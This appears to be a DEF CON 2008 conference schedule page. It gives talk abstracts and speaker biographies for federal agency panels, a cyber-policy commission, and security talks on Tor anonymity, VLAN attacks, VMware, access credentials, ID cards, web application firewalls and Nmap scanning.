Ever had to sweat through an interrogation or watch some poor sap suffer a similar fate? Have you ever wanted to turn the tables and put those cruel individuals responsible on the chopping block? Well, now you can! With representatives from NSA, NASA, FBI, IRS, DHS, and other fine Federal agencies, you will have an abundance of opportunities to attempt to humiliate, harass, threaten, or even bring them to tears. Go ahead, hack away and take your best shot! Remember, what is said on this panel in Vegas, stays on this panel in Vegas...

Again this year we will have many federal agencies, split across two panels:

Information Assurance Panel: CERTs and first-responder organizations from agencies including DC3, DHS US-CERT, NSA, OSD, and NDU

Law Enforcement Counterintelligence Panel: including DC3, FBI, IRS, NCIS, NASA, NW3C, and the US Postal IG

Each of the agency reps makes an opening statement regarding their agency's role, then opens it up to the audience for questions.

Agencies that will have representatives include: Defense Cyber Crime Center (DC3), FBI, IRS, NCIS, NASA, DHS US-CERT, DoJ, National White Collar Crime Center (NW3C), NSA, US Postal IG, Office of the Secretary of Defense, and National Defense University.

For years DEFCON participants have played "Spot the Fed." For the 3rd year, the feds will play "Spot the Lamer." Come out and nominate a Lamer and watch the feds burn 'em.

Jim Christy, FX/DC3
* Dir of Futures Exploration
* Dir of the Defense Cyber Crime Institute
* R&D of digital forensic tools and processes
* Test & Validation of tools, both hardware and software, used in an accredited digital forensics lab
* Dir of Ops for the Defense Computer Forensics Lab
* LE/CI Liaison to OSD IA
* DoD Rep to the President's Infrastructure Protection Task Force
* US Senate Investigator, Permanent Subcommittee on Investigations
* 11 years Dir of AF OSI Computer Crime Investigations


Jerry Dixon, DHS
As Director of National Cyber Security Division (NCSD) of the Department of Homeland Security, Jerry Dixon leads the national effort to protect America's cyber infrastructure and identify cyber threats. He works collaboratively and facilitates strategic partnerships with stakeholders in the public sector, private industry, and the international arena. Mr. Dixon was appointed Director of the NCSD on January 7, 2006.

Prior to being chosen to lead NCSD, Mr. Dixon served as the Deputy Director of Operations for the U.S. Computer Emergency Readiness Team (US-CERT), where he was responsible for coordinating incident response activities across federal, state, and local government agencies and private sector organizations. Mr. Dixon was instrumental in creating US-CERT, which serves America as the 24x7x365 cyber watch, warning, and incident response center that protects the cyber infrastructure by coordinating defense against and response to cyber attacks. Mr. Dixon led the initial development of US-CERT's capabilities for analyzing and reducing cyber threats and vulnerabilities, disseminating cyber threat warning information, and coordinating incident response activities across federal, state, and local government agencies and private sector organizations, making it Homeland Security's primary element of cyber preparedness and response.

Before joining NCSD, Mr. Dixon was the founding director of the Internal Revenue Service's (IRS) Computer Security Incident Response Capability. In this role, Mr. Dixon led the operational cyber security capability for the IRS and developed its ability to detect and respond to attacks in order to protect American taxpayers' private information. Mr. Dixon has also served as Director of Information Security for Marriott International, a global private sector company, where he led cyber security planning, security architecture, and security operations.


Tim Fowler, NCIS
Tim is an active duty Marine Special Agent who has worked as a Cyber Agent for the NCIS Cyber Department in Washington, DC, for the last six years. Tim has 19 years of active duty service in the U.S. Marine Corps working in the fields of military police, polygraph, criminal investigations and computer crime investigations and operations. While working as a Cyber Agent for NCIS, Tim specializes in conducting criminal, counterintelligence and counter-terrorism computer crime investigations and operations. Tim also has extensive knowledge and experience conducting media exploitation operations in hostile environments. In 2004, Tim was awarded the Bronze Star with combat Valor device by the Secretary of the Navy for his media exploitation efforts in Iraq.


Barry J. Grundy, NASA
Barry J. Grundy has worked as a Special Agent for the NASA Office of Inspector General (OIG), Computer Crimes Division (CCD) for the past six years. In that time he has been responsible for conducting computer intrusion investigations related to NASA systems. In 2005, SA Grundy received the annual Inspector General's award for his investigative efforts. He currently serves as the Resident Agent in Charge of the Eastern Region of the NASA OIG CCD, responsible for the supervision of criminal investigations related to cyber events at eight NASA Centers. Before working for the NASA OIG, SA Grundy was employed as a Special Agent for the Ohio Attorney General's Office, Health Care Fraud Unit, where he was responsible for the computer seizure and forensic media analysis support for the unit in addition to maintaining a normal health care fraud case load.

Prior to his law enforcement career, Grundy served for six years in the United States Marine Corps. All of his active duty service was spent in Reconnaissance Battalions, eventually as a Recon Team Leader, Scout/Sniper, and Combat Diver.

SA Grundy currently lives in Maryland with his wife, Jo Ann and son, Patrick. Hobbies include motorcycles, computers, and outdoor activities.


Andrew Fried, IRS
Andrew Fried is a Senior Special Agent with the Treasury Inspector General for Tax Administration's System Intrusion and Network Attack Response Team (SINART). His organization is responsible for investigating computer security incidents involving the Internal Revenue Service.

During his 17-year career with Treasury, he is credited with developing his agency's Computer Investigative Specialist (CIS) program, whose members are responsible for analyzing seized computers, as well as the SINART program, whose mission is to investigate computer intrusions and conduct proactive network penetration testing.

In 1986, while working at the Kennedy Space Center, he developed one of the first suites of software programs specifically designed for analyzing seized computers. His software was distributed, free of charge, to law enforcement agencies throughout the world.


Bob Hopper, NW3C
Mr. Hopper manages the NW3C Computer Crimes instructor cadre, which provides computer forensics training to state and local law enforcement throughout the United States. The Computer Crimes Section offers basic, intermediate and advanced training in computer forensics and computer crimes, and provides technical assistance and research and development for computer forensic examiners.

Mr. Hopper retired with nearly thirty years of service with the Arizona Department of Public Safety and thirty-seven years in law enforcement. Mr. Hopper's law enforcement career included assignments in Narcotics, Air Smuggling, White Collar Crime and Organized Crime. Mr. Hopper also developed and managed the Arizona DPS Regional Computer Forensic Lab. This computer forensic lab grew from a two-man unit in 1998 to a state-of-the-art computer forensic lab that, in 2005 when he retired, spanned seven state, local and federal agencies and nearly twenty-five computer forensic examiners.


Michael J. Jacobs, SRA International, Inc.
Michael Jacobs joined SRA in October 2002 as a Senior Advisor following his retirement from the Federal Government after 38 years of service. In March 2003 he was appointed Director of SRA's Cyber and National Security Program. Prior to SRA, Mr. Jacobs was the Information Assurance (IA) Director at the National Security Agency (NSA). Under his leadership, NSA began implementing an Information Assurance strategy to protect the Defense Information Infrastructure and as appropriate, the National Information Infrastructure. He was responsible for overseeing the evolution of security products, services, and operations to ensure that the Federal Government's national security information was free-flowing, unobstructed and uncorrupted.

Mr. Jacobs had a long and distinguished career at the National Security Agency where he served in key management positions in both the Intelligence and IA mission areas. He served as the Deputy Associate Director for Operations, Military Support where he was responsible for developing a single, coherent military support strategy for NSA. During his 38 years of NSA service, Jacobs was a leader in Information Systems Security production and control, policy and doctrine and customer relations. He has testified before Congress on defense issues and has spoken widely on topics ranging from IA to cultural diversity. For his vision, dedication, and accomplishments, he has been recognized by the Department of Defense with the Distinguished Civilian Service Medal; by the Director Central Intelligence with the Intelligence Community's Distinguished Service Award; and by NSA with the Exceptional Civilian Service Award. In addition, he has been awarded the National Intelligence Medal of Achievement and was twice awarded the Presidential Rank Award for Meritorious Achievement.

He earned his B.S. degree in Business Administration from King's College and completed the Senior Managers in Government Program at Harvard University's Kennedy School.

Mr. Jacobs resides in College Park, Maryland with his wife Ethel and their five children. From 1997 through 2001 he served as the City's elected Mayor following fourteen years as an elected member of the City Council.


Timothy Kosiba, FBI
Timothy Kosiba has been a Forensic Examiner with the FBI CART Program for 12 years, and managing the CART-BWI Laboratory in Linthicum, Maryland for the last 6 years. Mr. Kosiba has a B.S. in Management Information Systems from the University of Baltimore, and M.S. in Forensic Science from George Washington University. Currently, he is also the Program Manager for the Forensic Networks Program within CART, and is responsible for managing the deployment of 25 Storage Area Networks around the country, for use in examining and reviewing digital evidence. Mr. Kosiba is also a Certified ASCLD/LAB Inspector in the discipline of Digital Forensics.


Robert F. Lentz, OSD
Mr. Lentz is the Director for Information Assurance (IA) in the Office of the Assistant Secretary of Defense, Networks and Information Integration/Chief Information Officer. He is the Chief Information Assurance Officer (CIAO) for the Department of Defense (DoD) and oversees the Defense-wide IA Program, which plans, monitors, coordinates, and integrates IA activities across DoD. Mr. Lentz is also the Chairman of the National Space INFOSEC Steering Council (NSISC), a member of the Presidential Sub-Committee on National Security Systems (CNSS), the Manager of the DoD IA Steering Council, and the IA Domain Owner of the Global Information Grid Enterprise Information Management Mission Area. In his capacity as IA Domain Owner, Mr. Lentz is a member of the DoD CIO Executive Council. He also reports to the Deputy Undersecretary for Security and Counter-Intelligence and is a member of the Information Operations (IO) Steering Council. Mr. Lentz represents DoD on several private sector boards, including the Center for Internet Security (CIS) Strategic Advisory Council, the Common Vulnerabilities & Exposures (CVE) Senior Advisory Council, and the Federal Electronic Commerce Coalition (FECC).

Mr. Lentz has over 26 years of experience with the National Security Agency (NSA) in the areas of financial management and technical program management. He has served as Chief of the Space and Networks IA Office, Chief Financial Officer of the NSA IA Directorate, Executive Assistant to the NSA SIGINT Collections and Operations Group, and Field Chief of the Finksburg National Public Key Infrastructure / Key Management Infrastructure Operations Center. He has also served on several strategic planning and acquisition reform panels. Mr. Lentz has received the NSA Resource Manager of the Year Award, the Defense Meritorious Service Award, the 2003 Presidential Rank Award and the 2004 "Federal 100" award. In 2004, Mr. Lentz also received the highest-level honorary award the Department can bestow on a civilian employee, the prestigious Secretary of Defense Distinguished Civilian Service Award. Mr. Lentz is a graduate of the National Senior Cryptologic Course at the National Cryptologic School, the Federal Executive Institute (FEI) and the Resource Management Course at the Naval Postgraduate School. He earned a Bachelor of Science Degree with a double major in History and Political Science from Saint Mary's College of Maryland and a Masters Degree in National Security Strategy from the National War College. While attending the National War College in 1999, Mr. Lentz's primary focus was on Homeland Security.


Richard Marshall, NSA
Mr. Richard H. L. Marshall is the Senior Information Assurance (IA) Representative, Office of Legislative Affairs at the National Security Agency (NSA). NSA's Legislative Affairs Office is the Agency's point of contact for all NSA matters concerning Congress and is committed to maintaining a relationship with Congress built on trust, candor, completeness, correctness, consistency, and corporateness. Mr. Marshall has been instrumental in framing critical appreciation by key Senators and Representatives on Information Assurance and its impact on helping to protect the nation's critical infrastructures. As an additional duty, Mr. Marshall also represents NSA in the National Centers of Academic Excellence in Information Assurance Program in Boston, Massachusetts and the Detroit, Michigan areas where he led the effort to establish an International Consortium on Information Assurance.

Mr. Marshall was selected by Dick Clarke, the Cyber Advisor to the President, to serve as the Principal Deputy Director, Critical Infrastructure Assurance Office (CIAO), Bureau of Industry and Security, Department of Commerce, where he led a team of 40 dedicated professionals in coordinating and implementing the Administration's National Security for Critical Infrastructure Protection initiative to address potential threats to the nation's critical infrastructures. He persuasively articulated the business case for enhancing information assurance in government and private sectors, and championed national outreach and awareness of information assurance issues to key stakeholders such as owners and operators of critical infrastructures, opinion influencers, business leaders, and government officials.

Before being nominated by the DIRNSA and approved by the SECDEF to serve in an Executive Development assignment to help lead the CIAO, Mr. Marshall served with distinction as the Associate General Counsel for Information Systems Security/Information Assurance, Office of the General Counsel, National Security Agency for over eight years. In that capacity, Mr. Marshall provided advice and counsel on national security telecommunications and technology transfer policies and programs, the National Information Assurance Partnership, the Common Criteria Mutual Recognition Arrangement, legislative initiatives and international law. Mr. Marshall was the legal architect for the Joint Chiefs of Staff directed exercise "Eligible Receiver 97" that spotlighted many of the cyber-vulnerabilities of our nation's critical infrastructures and helped bring focus on this issue at the national leadership level.

Mr. Marshall graduated from The Citadel with a B.A. in Political Science; Creighton University School of Law with a J.D. in Jurisprudence; Georgetown School of Law with an LL.M. in International and Comparative Law; was a Fellow at the National Security Law Institute, University of Virginia School of Law in National Security Law; attended the Harvard School of Law Summer Program for Lawyers; the Georgetown University Government Affairs Institute on Advanced Legislative Strategies and participated in the Information Society Project at Yale Law School and in the Privacy, Security and Technology in the 21st Century program at Georgetown University School of Law.


Ken Privette, USPS
Ken works as the Special Agent in Charge of the Computer Crimes Unit (CCU) at the United States Postal Service Office of Inspector General. His Unit conducts computer crime investigations and provides computer forensics support to a force of over 650 agents who conduct fraud and internal crime investigations for the U. S. Postal Service. Over the past two years Ken's team has doubled in size, now managing a computer forensics workload of more than 900 requests per year.

Ken spent much of his professional life as a Special Agent with the Naval Criminal Investigative Service both overseas and state-side where he conducted investigations involving computer crime, terrorism, and counterintelligence matters.


Keith Rhodes, GSA
Keith Rhodes is currently the Chief Technologist of the U. S. Government Accountability Office and Director of the Center for Technology & Engineering. He provides assistance throughout the Legislative Branch on computer and telecommunications issues and leads reviews requiring significant technical expertise. He has been the senior advisor on a range of assignments covering continuity of government & operations, export control, computer security & privacy, e-commerce & e-government, voting systems, and various unconventional weapons systems. He has served as a Commissioner on the Independent Review of the National Imagery and Mapping Agency. Before joining GAO, he was a supervisory scientist at the Lawrence Livermore National Laboratory. His other work experience includes computer and telecommunications projects at Northrop Corporation and Ohio State.

Linton Wells II, Principal Deputy Assistant Secretary of Defense, Networks and Information Integration
Dr. Linton Wells II serves as the Principal Deputy Assistant Secretary of Defense (Networks and Information Integration). He resumed these duties on November 14, 2005 after serving as the Acting Assistant Secretary and DoD Chief Information Officer from March 8, 2004. He became the Principal Deputy Assistant Secretary of Defense (Command, Control, Communications and Intelligence) on August 20, 1998 which became Networks and Information Integration in 2003. Prior to this assignment, he had served in the Office of the Under Secretary of Defense (Policy) from 1991 to 1998, most recently as the Deputy Under Secretary of Defense (Policy Support).

In twenty-six years of naval service, Dr. Wells served in a variety of surface ships, including command of a destroyer squadron and guided missile destroyer. In addition, he acquired a wide range of experience in operations analysis; Pacific, Indian Ocean and Middle East affairs; C3I; and special access program oversight.

Dr. Wells was born in Luanda, Angola, in 1946. He was graduated from the United States Naval Academy in 1967 and holds a Bachelor of Science degree in physics and oceanography. He attended graduate school at The Johns Hopkins University, receiving a Master of Science in Engineering degree in mathematical sciences and a PhD in international relations. He is also a 1983 graduate of the Japanese National Institute for Defense Studies in Tokyo, the first U.S. naval officer to attend there.

Dr. Wells has written widely on security studies in English and Japanese journals. He co-authored Japanese Cruisers of the Pacific War, which was published in 1997. His hobbies include history, the relationship between policy and technology, scuba diving, and flying.


Panel: Commission on Cyber Security for the 44th Presidency


Michael J. Assante
Idaho National Lab (INL)
Jerry Dixon
Director of Analysis, Team Cymru
Tom Kellermann
CISM, VP of Security Awareness, Core Security Technologies
Marcus Sachs
Executive Director of Government Affairs for National Security Policy, Verizon

The Center for Strategic and International Studies (CSIS) has established a Commission on Cyber Security for the 44th Presidency - the administration that will take office in January 2009. The goal of the nonpartisan Commission is to develop recommendations for a comprehensive strategy to improve cyber security in federal systems and in critical infrastructure. Hear what is going on with this Commission, ask questions, and provide input on what you think should be addressed at a Presidential level for the next administration.

Michael J. Assante, a recognized security and infrastructure protection visionary and new product development leader, brings a powerful combination of leadership/domain experience, technological vision and strategy development to the Idaho National Lab (INL). He was selected by his peers as the winner of Information Security Magazine’s 2007 Security 7 leadership award for his efforts as a “strategic thinker”.

Prior to assuming his strategic leadership position at INL, Mr. Assante was a vice president and Chief Security Officer at American Electric Power, the largest generator of electric power in the US, serving 5 million customers in eleven states. He provided leadership, developed and implemented strategies to enhance security and business continuity for AEP; he was also responsible for protecting and maintaining corporate facilities, critical operating assets and property; and ensured the security and continued preservation of all corporate information and proprietary data and the technology that supports it. He was selected for outstanding contribution at the RSA 2005 Conference and received the award for outstanding achievement in the practice of security within an organization. He has been recognized by SC Magazine among all Chief Security Officers as one of two finalists for the global 2005 awards as CSO of the year. He was selected as a finalist for Information Security Executive of the Year of the Midwest in 2005. In 2003, Mr. Assante was awarded “The Best of the Best – Best Governance Program” (Information Security Magazine, December 2003) for the establishment of an enterprise executive security committee.

Prior to assuming a vice president’s position as Chief Security Officer at AEP, Mr. Assante, as a reserve naval intelligence officer, filled a critical position at the National Infrastructure Protection Center. In 1997, Mr. Assante was named Naval Intelligence Officer of the Year. In 2002 Assante was selected as one of Columbus Ohio’s Top 40 people under 40.

Jerry Dixon is currently the Director of Analysis for Team Cymru and serves as Infragard's Vice President for Government Relations. He was formerly the Executive Director of the National Cyber Security Division (NCSD) & US-CERT at the Department of Homeland Security. He currently serves as a member of the CSIS Cyber-Commission on Cyber-Security for the 44th President and a member of the Advisory Board for Debix, an Identity Theft Protection Company.

During his time at Homeland, Jerry led the national effort to protect America's cyber infrastructure and identify cyber threats. Prior to being chosen to lead NCSD, Mr. Dixon served as the Deputy Director of Operations for the U.S. Computer Emergency Readiness Team (US-CERT). Mr. Dixon was instrumental in creating US-CERT, which serves America as the 24x7x365 cyber watch, warning, and incident response center that protects the cyber infrastructure by coordinating defense against and response to cyber attacks. Mr. Dixon led the initial development of US-CERT's capabilities for analyzing and reducing cyber threats and vulnerabilities, disseminating cyber threat warning information, and coordinating incident response activities across federal, state, local government agencies, and private sector organizations, making it Homeland Security's primary element of cyber preparedness and response.

Before joining NCSD, Mr. Dixon was the founding director of the Internal Revenue Service's (IRS) Computer Security Incident Response Capability. In this role, Mr. Dixon led the IRS's operational cyber security capability and developed its ability to detect and respond to security attacks in order to protect American taxpayers' private information. Mr. Dixon has also served as Director of Information Security for Marriott International, a global private sector company, where he led cyber security planning, security architecture, and security operations.

Tom Kellermann is responsible for building Core's relationships with key industry and government partners, and helping further the acceptance of auditing security defenses to reduce organizations' operational risk.

Additionally, Kellermann represents Core at US, international and industry security working groups, helping these organizations promote improved security practices and policies. Specifically, Tom is a Commissioner and Chair of the Threats Working Group on The Commission on Cyber Security for the 44th Presidency. Tom also serves as the Chair of the Technology Working Group for the Financial Coalition Against Child Pornography.

Tom Kellermann formerly held the position of Senior Data Risk Management Specialist for the World Bank Treasury Security Team. Tom was responsible for cyber-intelligence and policy management within the World Bank Treasury.

Tom regularly advised central banks around the world on their cyber-risk posture and layered security architectures.

Along with Thomas Glaessner and Valerie McNevin, he co-authored the book E-safety and Soundness: Securing Finance in a New Age and the white paper E-security: Risk Mitigation in Financial Transactions. Tom is also the author of numerous World Bank white papers on cyber security: Mobile Risk Management, The Digital Insider, Phishing in Digital Streams, Bots: Cyber Parasites, Zero Day, and Money Laundering in Cyberspace. See:

http://www.worldbank.org/finance/esecurity

Tom is an active member of the IP Governance Task Force, The National Consumer League's Anti-Phishing Working Group, The New York Chapter of Infragard, the IPv6 Forum and is an active member of the American Bar Association's working group on Cyber-crime. Tom is a Certified Information Security Manager (CISM).

Marcus Sachs is a member of the CSIS Commission on Cyber Security for the 44th Presidency and since 2003 has volunteered as the director of the SANS Internet Storm Center. He is a retired US Army officer, a former Presidential appointee to the staff of the National Security Council, and was part of the original cadre of DHS' National Cyber Security Division in 2003. He currently works at Verizon as an Executive Director of Government Affairs for National Security Policy. Prior to joining Verizon in 2007 he was the deputy director of SRI International's Computer Science Laboratory.


de-Tor-iorate Anonymity


Nathan Evans
Ph.D Student, University of Denver
Christian Grothoff

Feel safe and comfortable browsing the Internet with impunity because you are using Tor? Feel safe no more! We present an attack on the Tor network that means that the bad guys could find out where you are going on the Internet while using Tor. This presentation goes over the design decisions that have made this attack possible, as well as showing results from a Tor network that reveal the paths that data travels when using Tor. This method can make using the Tor network no more secure than using a simple open web proxy. We go over the attack in detail, as well as possible solutions for future versions of Tor.

Nathan Evans is a Ph.D student at the University of Denver working in the areas of security, privacy, anonymity, and performance in P2P networks. While he seems to be running around trying to break all the networks, his intentions are to improve the current state of affairs with regard to security. Previous work includes Routing in the Dark: Pitch Black (presented at Defcon 15) and work on evaluating various P2P systems published in the German magazine IX.

Christian Grothoff is an assistant professor of computer science at the University of Denver. He earned his PhD in computer science from UCLA in expressive type systems for object-oriented languages. His research interests include compilers, programming languages, software engineering, networking and security. He also is the primary author and maintainer of GNUnet, GNU's peer-to-peer framework.


Hacking the Bionic Man


Gadi Evron

Science fiction or security in 2040?

In this lecture we will discuss how security issues may impact the future, which may be confused with science fiction.

Already today we find cyber-implants of different kinds embedded within the human machine. As security professionals we know there is no such thing as perfect code, and security solutions are far from perfect. What will we be facing in 2040, and how might we defend ourselves - if at all?

Gadi Evron is recognized globally for his work and leadership in Internet security operations. He is the founder of the Zeroday Emergency Response Team (ZERT), organizes and chairs worldwide conferences, working groups and task forces. He is considered an expert on corporate security and counterespionage, botnets, e-fraud and phishing. Previously, Gadi was CISO at the Israeli government ISP (eGovernment project) and founded the Israeli Government CERT. Gadi authored two books on information security and is a frequent lecturer.


Identification Card Security: Past, Present, Future


Doug Farre
Administrative Director, Locksport International

Come learn how identification cards have taken over our lives, how they can be manufactured at home, and how you can start a legal ID making business. Come learn all the tips and tricks about amateur ID manufacturing and pick up the first ever Complete Amateur ID Making Guide. Also, come test your ability to spot a fake versus a real one, and check out the newest in ID technology: polycarbonate laminates, biometrics, Teslin, and RFID. Lastly, see how corporations are affecting the identification card fiasco in the U.S. What's in your wallet?

Doug Farre is the Administrative Director of Locksport International, President of the Longhorn Lockpicking Club, and Editor in Chief of Non Destructive Entry Magazine. Doug is interested in all types of security and is currently a Geophysics student at the University of Texas at Austin. He teaches scuba diving in his free time.


Snort Plug-in Development: Teaching an Old Pig New Tricks


Ben Feinstein
Security Researcher, SecureWorks Counter Threat Unit

Snort has become a standard component of many IT security environments. Snort is mature and widely deployed, and is no longer viewed as new or exciting by the industry. However, with such widespread deployment, enhancing Snort’s capabilities offers the potential for a large and immediate impact. Instead of chasing the industry’s new-hotness of the day, it frequently makes more sense to add new capabilities to an existing security control.

With this in mind, the author set out to implement new and innovative capabilities in the form of GPL-licensed Snort plug-ins. The author will introduce the Snort plug-in architecture and the relevant APIs used when implementing extensions to Snort. Lessons learned and pitfalls to avoid when developing Snort plug-ins will be covered. Some interesting code snippets will be discussed. Ideas for future work in the area of Snort extensions will be presented.

Ben Feinstein is a researcher on the Counter Threat Unit (CTU) at SecureWorks, working behind the scenes to support Agent Jack Bauer and the GWOT. He first became involved with information security in 2000 while working on a DARPA / USAF contract instead of going to his college classes. Since then, Ben has worked designing and implementing security-related software and appliances at a series of since acquired or failed start-ups. In his spare time Ben authored RFC 4765 and RFC 4767. His experience is in the areas of IDS/IPS, digital forensics, next-gen firewall systems, log analysis and viz, secure messaging, security appliances, small caliber arms and right-wing rhetoric. Ben has presented at Black Hat USA, DEFCON, ACSAC and others.


The Wide World of WAFs


Ben Feinstein
Security Researcher, SecureWorks Counter Threat Unit

With webapp protection now mandated by the PCI standard, web-application firewalls (WAFs) have received newfound interest from both consumers of security technologies, as well as from security researchers and potential attackers. Now that WAFs are a PCI-approved substitute for code reviews, expect many vendors to opt for this potentially less costly route to compliance. Of course, security researchers and potential attackers will increasingly train their sights on this lucrative and expanding target.

This talk will explore the ModSecurity Apache module and how it is being used as a WAF to meet the PCI 6.6 webapp protection requirement. The relative strengths and weaknesses of WAFs in general and ModSecurity in particular will be highlighted. Common deployment scenarios will be discussed, including both in-the-cloud, stand-alone and Apache server embedded deployments. The ModSecurity rules language will be covered and several ModSecurity Core Rules that are representative of its capabilities will be dissected in depth. Finally, some interesting uses of ModSecurity's content injection capabilities will be discussed. Anyone up for hacking the hacker via scripting injected into your webapp's response to an attempted attack? This talk will show you how!

Ben Feinstein is a researcher on the Counter Threat Unit (CTU) at SecureWorks, working behind the scenes to support Agent Jack Bauer and the GWOT. He first became involved with information security in 2000 while working on a DARPA / USAF contract instead of going to his college classes. Since then, Ben has worked designing and implementing security-related software and appliances at a series of since acquired or failed start-ups. In his spare time Ben authored RFC 4765 and RFC 4767. His experience is in the areas of IDS/IPS, digital forensics, next-gen firewall systems, log analysis and viz, secure messaging, security appliances, small caliber arms and right-wing rhetoric. Ben has presented at Black Hat USA, DEFCON, ACSAC and others.


VLANs Layer 2 Attacks: Their Relevance and their Kryptonite


Kevin Figueroa
CEO & Information Security Engineer, K&T International Consulting, Inc.
Marco Figueroa
CEO & Senior Security Analyst, MAF Consulting, Inc.
Anthony L. Williams
CEO & Information Security Architect, IRON::Guard Security, LLC

Proper network infrastructure configuration is a crucial step in a successful defense in depth strategy for any organization. The fact that the network fabric is susceptible to these Layer 2 attacks years after their initial discovery is alarming and disgusting at the same time. We propose to revisit these attacks using contemporary techniques and tools and also offer equally contemporary solutions to mitigate or foil these malicious network attacks as the case may be. Networking professionals will be able to walk away from this presentation with solid remedies to these issues and a reinforcement that they actually still exist and are pertinent to a network security strategy that will function now and in the future.

Kevin Figueroa is CEO and Information Security Engineer for K & T International Consulting, Inc., providing a spectrum of services such as security analysis, penetration testing, compliance audit, wireless security assessment, and reverse engineering analysis. Over the last 10 years he has developed security skills which have led him to various employment opportunities at organizations such as CitiGroup and CNN/Money. He holds the following certifications: A+, Network+, Security+, CEH. Contact him at kfigueroa@kandtcorp.com or http://www.ktinternationalconsulting.com

Marco Figueroa is the CEO and Senior Security Analyst with MAF Consulting Inc, a New York City information security consulting firm. Marco's expertise includes reverse engineering malware, incident handling, hacker attacks and defenses. He has performed numerous security assessments, and responded to computer attacks for clients across market verticals. Marco holds the following certifications: CEH, GCIH, GREM, Security+, Network+, A+. Contact him at Marco.figueroa@mafcorp.net or http://www.mafcorp.net.

Anthony L. Williams is the CEO and Information Security Architect for IRON::Guard Security, LLC where he performs penetration testing, vulnerability assessments, audits and incident response. His experience as an information security professional with over 13 years of IT experience includes proficiency in regulatory environments such as Sarbanes-Oxley and the Health Insurance Portability and Accountability Act, with an extensive background in IT audits using ISO/BS 17799 and COBIT. Anthony is a member of the FBI Infragard, Information Systems Security Association and Information Systems Audit and Control Association.


Virtually Hacking


John Fitzpatrick
Information Security Consultant - MWR InfoSecurity

Own the VMware box and you get half the servers on the network for free. Although, depending on the VMware server's configuration, whether you want to be stealthy about it and whether you want to avoid any disruption, it may not always be quite that simple. During this talk we will take a look at ways of jumping from a server to a guest OS without causing any disruption and also some tools for assessing the security posture of VMware products.

With VMware becoming an integral part of many networks it is important that the security level of its deployment is assessed appropriately. Without the right tools to do the job this can be a slow and painful task; with the right tools you can have a lot of fun. I'll demo some tools which I have been working on that harness the power of dradis and make testing and possibly owning VMware servers and VMs a virtually painless task.

John Fitzpatrick is an information security consultant working in the UK for MWR InfoSecurity performing penetration and application tests. His primary interests are in searching for security issues in anything that might make a network a playground and in writing code that does fun things. John is always researching some protocol, software or technology, generally with the goal of breaking it or finding a new interesting attack vector; most recently this research has been targeted towards VMWare. He is also highly experienced in a technique which enables him to code all night and still turn up to work in the mornings.


Is that a unique credential in your pocket or are you just pleased to see me?


Zac Franken
Security Researcher

This year new shiny toys abound, as I'll tell you about the credentials in your wallet, and even in you. How secure (or not) they are and a few ways to duplicate / replicate / emulate them.

Last year at Defcon 15 I had a bit of a chat with you guys and gave you an overview of access control systems, told you of their common flaw, and showed you some cool toys that exploit it. This year, from the humble magnetic stripe card to the modern hand geometry scanner, I will take you through some simple (and not so simple) ways to get in, so you can try and keep them out.

Physical access control systems are shockingly vulnerable. As far as I am concerned most have the security equivalence of a "Please keep off the grass" sign.

Take that "Please keep off the grass" sign, add poor implementation, bad products, and a security industry that charges extra for any security whatsoever, poor locks that are pickable/bumpable, add accountants that nickel and dime their organization's security budget (because it doesn't have to be secure, it just has to enable them to tick a box in their corporate filings), and you end up with a sign that says "eep ass" which only delays an intruder inasmuch as they briefly stop to ponder WTF you meant by the sign in the first place.

Why are you here? Why aren't you at home on the porch with a shotgun protecting your property?!

Wait a minute...... Why am I here?!

Zac Franken is an independent security researcher based in London, currently looking at physical access control systems. When he is not speaking at Defcon, he is running Defcon operations, i.e. losing his mind because of YOU! Or speaking at other security conferences around the world.


Exploiting A Hundred-Million Hosts Before Brunch


Stefan Frei
Security Researcher
Thomas Duebendorfer
Security Researcher
Gunter Ollmann
Security Researcher
Martin May
Security Researcher

If you were to "hack the planet" how many hosts do you think you could compromise through a single vulnerable application technology? A million? A hundred-million? A billion? What kind of application is so ubiquitous that it would enable someone to launch a planet-wide attack? - why, the Web browser of course! We've all seen and studied one side of the problem - the mass-defacements and iframe injections. But how many vulnerable Web browsers are really out there? How fast are they being patched? Who's winning the patching race? Who's the tortoise and who's the hare? Our latest global study of Web browser use (tapping in to Google's massive data repositories) has revealed some startling answers along with a new perspective on just how easy it would be to "hack the planet" if you really felt like it.

Paper Download and Contact
--------------------------
W: http://www.techzoom.net/insecurity-iceberg
M: insecurity-iceberg@ee.ethz.ch

Stefan Frei has refined and exercised his pentesting, consulting, and security research skills daily for more than a decade. After several years with the ISS X-Force, he decided to go for a PhD to combine academic research with his experience gained in the field. His research interests are the vulnerability ecosystem, security econometrics, and networking security. As a licensed helicopter and fixed wing aerobatic pilot he is used to looking ahead and thinking outside the box. He is a frequent contributor to security conferences, such as BlackHat or FIRST.

Thomas Duebendorfer works on the security of Google's online ad system as a software engineer tech lead at Google Switzerland GmbH in Zurich. He is currently the president of the Information Security Society Switzerland ISSS and also a lecturer at ETH Zurich, the Swiss Federal Institute of Technology. He has earned a Ph.D. and an M.S. degree with honors and distinction from ETH Zurich.

Gunter Ollmann has been paid to break in to the largest and best known organizations around the world for the last decade, led some of the world's best known penetration testing teams and most respected security R&D divisions and, when not writing yet another whitepaper or blogging on security, he's crystal-balling the threats and countermeasures for three-years hence. Google Search is a wonderful thing, and with a name as unique as his, there's nowhere to hide.

Martin May received his Master's degree in computer science from the University of Mannheim in 1996. In 1999, he received his Ph.D. degree at INRIA Sophia Antipolis. During his PhD, he was also a technical staff member of Lucent Bell-Labs Research, Holmdel, USA and Sprintlabs, Burlingame, USA, where he continued his research. In early 2000, he founded a start-up company in France working in the field of content networking, which he sold at the end of 2003. Since then, he has been a senior research associate at the Swiss Federal Institute of Technology in Zurich (ETH Zurich). His research interests are in future Internet architectures and network security. Dr. May has chaired multiple workshops and conferences on network security and has also served on technical program committees for many networking conferences.


Nmap: Scanning the Internet


Fyodor
Hacker, Insecure.Org

The Nmap Security Scanner was built to efficiently scan large networks, but Nmap's author Fyodor has taken this to a new level by scanning millions of Internet hosts as part of the Worldscan project. He will present the most interesting findings and empirical statistics from these scans, along with practical advice for improving your own scan performance. Additional topics include detecting and subverting firewall and intrusion detection systems, dealing with quirky network configurations, and advanced host discovery and port scanning techniques. A quick overview of new Nmap features will also be provided.

